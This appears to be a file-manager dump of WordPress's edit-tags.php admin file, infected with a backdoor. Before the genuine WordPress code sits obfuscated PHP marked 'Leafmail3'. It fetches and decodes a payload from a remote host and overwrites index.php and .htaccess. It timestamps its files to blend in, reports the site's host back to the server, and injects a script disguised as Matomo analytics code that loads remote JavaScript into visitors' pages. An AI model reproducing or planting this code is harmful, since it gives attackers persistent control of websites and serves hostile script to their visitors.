Edit file File name : edit-tags.php Content :<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?> <?php /** * Edit Tags Administration Screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! $taxnow ) { wp_die( __( 'Invalid taxonomy.' ) ); } $tax = get_taxonomy( $taxnow ); if ( ! $tax ) { wp_die( __( 'Invalid taxonomy.' ) ); } if ( ! in_array( $tax->name, get_taxonomies( array( 'show_ui' => true ) ), true ) ) { wp_die( __( 'Sorry, you are not allowed to edit terms in this taxonomy.' ) ); } if ( ! current_user_can( $tax->cap->manage_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ) . '</p>', 403 ); } /** * $post_type is set when the WP_Terms_List_Table instance is created. * * @global string $post_type Global post type. */ global $post_type; $wp_list_table = _get_list_table( 'WP_Terms_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); $title = $tax->labels->name; if ( 'post' !== $post_type ) { $parent_file = ( 'attachment' === $post_type ) ? 'upload.php' : "edit.php?post_type=$post_type"; $submenu_file = "edit-tags.php?taxonomy=$taxonomy&post_type=$post_type"; } elseif ( 'link_category' === $tax->name ) { $parent_file = 'link-manager.php'; $submenu_file = 'edit-tags.php?taxonomy=link_category'; } else { $parent_file = 'edit.php'; $submenu_file = "edit-tags.php?taxonomy=$taxonomy"; } add_screen_option( 'per_page', array( 'default' => 20, 'option' => 'edit_' . $tax->name . '_per_page', ) ); get_current_screen()->set_screen_reader_content( array( 'heading_pagination' => $tax->labels->items_list_navigation, 'heading_list' => $tax->labels->items_list, ) ); $location = false; $referer = wp_get_referer(); if ( ! $referer ) { // For POST requests. $referer = wp_unslash( $_SERVER['REQUEST_URI'] ); } $referer = remove_query_arg( array( '_wp_http_referer', '_wpnonce', 'error', 'message', 'paged' ), $referer ); switch ( $wp_list_table->current_action() ) { case 'add-tag': check_admin_referer( 'add-tag', '_wpnonce_add-tag' ); if ( ! current_user_can( $tax->cap->edit_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to create terms in this taxonomy.' ) . '</p>', 403 ); } $ret = wp_insert_term( $_POST['tag-name'], $taxonomy, $_POST ); if ( $ret && ! is_wp_error( $ret ) ) { $location = add_query_arg( 'message', 1, $referer ); } else { $location = add_query_arg( array( 'error' => true, 'message' => 4, ), $referer ); } break; case 'delete': if ( ! isset( $_REQUEST['tag_ID'] ) ) { break; } $tag_ID = (int) $_REQUEST['tag_ID']; check_admin_referer( 'delete-tag_' . $tag_ID ); if ( ! current_user_can( 'delete_term', $tag_ID ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to delete this item.' ) . '</p>', 403 ); } wp_delete_term( $tag_ID, $taxonomy ); $location = add_query_arg( 'message', 2, $referer ); // When deleting a term, prevent the action from redirecting back to a term that no longer exists. $location = remove_query_arg( array( 'tag_ID', 'action' ), $location ); break; case 'bulk-delete': check_admin_referer( 'bulk-tags' ); if ( ! current_user_can( $tax->cap->delete_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to delete these items.' ) . '</p>', 403 ); } $tags = (array) $_REQUEST['delete_tags']; foreach ( $tags as $tag_ID ) { wp_delete_term( $tag_ID, $taxonomy ); } $location = add_query_arg( 'message', 6, $referer ); break; case 'edit': if ( ! isset( $_REQUEST['tag_ID'] ) ) { break; } $term_id = (int) $_REQUEST['tag_ID']; $term = get_term( $term_id ); if ( ! $term instanceof WP_Term ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) ); } wp_redirect( sanitize_url( get_edit_term_link( $term_id, $taxonomy, $post_type ) ) ); exit; case 'editedtag': $tag_ID = (int) $_POST['tag_ID']; check_admin_referer( 'update-tag_' . $tag_ID ); if ( ! current_user_can( 'edit_term', $tag_ID ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to edit this item.' ) . '</p>', 403 ); } $tag = get_term( $tag_ID, $taxonomy ); if ( ! $tag ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) ); } $ret = wp_update_term( $tag_ID, $taxonomy, $_POST ); if ( $ret && ! is_wp_error( $ret ) ) { $location = add_query_arg( 'message', 3, $referer ); } else { $location = add_query_arg( array( 'error' => true, 'message' => 5, ), $referer ); } break; default: if ( ! $wp_list_table->current_action() || ! isset( $_REQUEST['delete_tags'] ) ) { break; } check_admin_referer( 'bulk-tags' ); $screen = get_current_screen()->id; $tags = (array) $_REQUEST['delete_tags']; /** This action is documented in wp-admin/edit.php */ $location = apply_filters( "handle_bulk_actions-{$screen}", $location, $wp_list_table->current_action(), $tags ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores break; } if ( ! $location && ! empty( $_REQUEST['_wp_http_referer'] ) ) { $location = remove_query_arg( array( '_wp_http_referer', '_wpnonce' ), wp_unslash( $_SERVER['REQUEST_URI'] ) ); } if ( $location ) { if ( $pagenum > 1 ) { $location = add_query_arg( 'paged', $pagenum, $location ); // $pagenum takes care of $total_pages. } /** * Filters the taxonomy redirect destination URL. * * @since 4.6.0 * * @param string $location The destination URL. * @param WP_Taxonomy $tax The taxonomy object. */ wp_redirect( apply_filters( 'redirect_term_location', $location, $tax ) ); exit; } $wp_list_table->prepare_items(); $total_pages = $wp_list_table->get_pagination_arg( 'total_pages' ); if ( $pagenum > $total_pages && $total_pages > 0 ) { wp_redirect( add_query_arg( 'paged', $total_pages ) ); exit; } wp_enqueue_script( 'admin-tags' ); if ( current_user_can( $tax->cap->edit_terms ) ) { wp_enqueue_script( 'inline-edit-tax' ); } if ( 'category' === $taxonomy || 'link_category' === $taxonomy || 'post_tag' === $taxonomy ) { $help = ''; if ( 'category' === $taxonomy ) { $help = '<p>' . sprintf( /* translators: %s: URL to Writing Settings screen. */ __( 'You can use categories to define sections of your site and group related posts. The default category is “Uncategorized” until you change it in your <a href="%s">writing settings</a>.' ), 'options-writing.php' ) . '</p>'; } elseif ( 'link_category' === $taxonomy ) { $help = '<p>' . __( 'You can create groups of links by using Link 